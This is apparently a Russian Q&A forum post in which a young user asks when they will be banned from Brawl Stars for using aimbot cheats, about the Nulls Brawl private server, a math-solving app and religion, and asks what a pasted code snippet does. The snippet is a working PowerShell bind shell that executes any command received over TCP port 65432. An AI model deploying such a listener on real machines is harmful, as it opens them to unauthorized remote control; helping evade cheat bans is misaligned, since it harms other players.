Когда меня забанят в Brawl Stars и ещё пару вопросов
я играю в бравл старс с читами (не реклама) когда меня забанят? читы не визуал, автоаим как у явного читера автоманс явно не человеческий ну и играю уже 2 дня, если вовремя брошу играть с читами меня не забанят?
также я играю в нюльс бравл (не реклама) ну там цензуры никакой нет и пиши где и что хочешь, я узнал что у нюльса есть какие-то правила там и задал сам себе вопрос "могут ли забанить в нюльсе?" может вас банили в Nulls Brawl? если да то почему, мне кажется там забанят только если фсб узнают про криминальные сделки в комнатах в нюльсе.
можно найти переменную f(x) если там выражения без f и без x да и вообще без =, пример скидывать и писать не буду (там не для слабонервных) я попробую скачать программу которая там по фото пример решает, одноклассники пользуются а я нет, что за программа (как называется)?
в какого бога вы верите? если в пуджа то почему?
предположите что за язык и что делает
$listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, 65432)
$listener.Start()
Write-Host "Server started, waiting for connection..."
while ($true) {
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = [System.IO.StreamReader]::new($stream)
$writer = [System.IO.StreamWriter]::new($stream)
$writer.AutoFlush = $true
Write-Host "Connection established!"
while ($true) {
$command = $reader.ReadLine()
if ($command -eq "exit") {
Write-Host "Shutting down server..."
break 2
} elseif ($command) {
Write-Host "Executing command: $command"
try {
$output = Invoke-Expression $command 2>&1
$writer.WriteLine($output)
} catch {
$writer.WriteLine($_)
}
}
}
$client.Close()
}
$listener.Stop()
на ссылки не переходите они случайные( там были пропуски строк но мыло ру не разрешило пустые строки сделать)список в коде случаен, лень убирать.
Блокировку аккаунта в игре можно получить, если вы нарушите правила Supercell. Есть 2 типа блокировок: временная и навсегда (перманентная). Они выдаются в зависимости от масштабов нарушения. Здесь вы узнаете, за что можно получить блокировку аккаунта в игре.